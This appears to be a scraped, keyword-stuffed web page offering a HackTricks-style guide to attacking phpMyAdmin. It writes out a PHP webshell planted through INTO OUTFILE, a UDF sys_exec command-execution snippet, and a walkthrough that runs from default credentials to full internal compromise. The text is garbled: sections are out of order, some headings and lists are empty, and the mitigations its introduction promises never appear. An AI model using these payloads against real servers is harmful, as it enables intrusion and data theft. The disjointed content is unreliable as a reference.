Phpmyadmin Hacktricks |work| May 2026

Mastering phpMyAdmin: A Comprehensive Guide to Exploitation, Bypasses, and Privilege Escalation (HackTricks Style)

1. Introduction

phpMyAdmin is a PHP application providing browser-based database administration. Its ubiquity and default configurations make it a frequent target for attackers seeking database access, data exfiltration, or pivots into application infrastructure. This paper outlines common vulnerabilities and misconfigurations, examples of exploitation approaches, indicators of compromise (IoCs), and concrete mitigations.

A. SQL to RCE via INTO OUTFILE

Write a webshell:

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php"

Requirements:

secure_file_priv="" (empty)
Writeable directory (e.g., /var/www/html, /tmp, /uploads)

Check secure_file_priv:

SHOW VARIABLES LIKE "secure_file_priv";

Part 8: Real-World Attack Simulation (Scenario)

Target: https://target.com/phpmyadmin/ (version 4.8.1) Step 1: Found accessible via dirb. Step 2: Weak credentials admin:admin succeed. Step 3: Run SHOW VARIABLES LIKE 'secure_file_priv' → empty value (good). Step 4: Write shell via INTO OUTFILE to /var/www/html/uploads/cmd.php. Step 5: Access https://target.com/uploads/cmd.php?cmd=id → uid=33(www-data). Step 6: Read /etc/passwd, find another DB password, pivot to production server. Outcome: Full internal compromise. phpmyadmin hacktricks

2.2 SQL Injection in .htpasswd (Legacy)

In older versions, a vulnerability existed where /etc/phpmyadmin/htpasswd.setup could be read or bypassed. Modern attacks focus on brute-force.

3.4 CVE-2016-5734 – RCE via LFI + PhpMyAdmin 4.0–4.6

Exploits a preg_replace with /e modifier. Attack vector: SQL table name containing PHP code. Metasploit: exploit/multi/http/phpmyadmin_rce Requirements:

4. UDF (User Defined Function) Execution

For MySQL versions < 5.1 or with plugin directory writable, compile a shared library and create a custom function to run commands.

CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'lib_mysqludf_sys.so';
SELECT sys_exec('whoami > /tmp/test.txt');

6. Privilege Escalation via MySQL

9. phpMyAdmin Configuration Leaks

Check config.inc.php (often readable):

Database credentials
$cfg['blowfish_secret'] (if weak, decrypt cookies)
$cfg['Servers'][$i]['controlpass']
$cfg['TempDir'], $cfg['UploadDir'] – may allow path traversal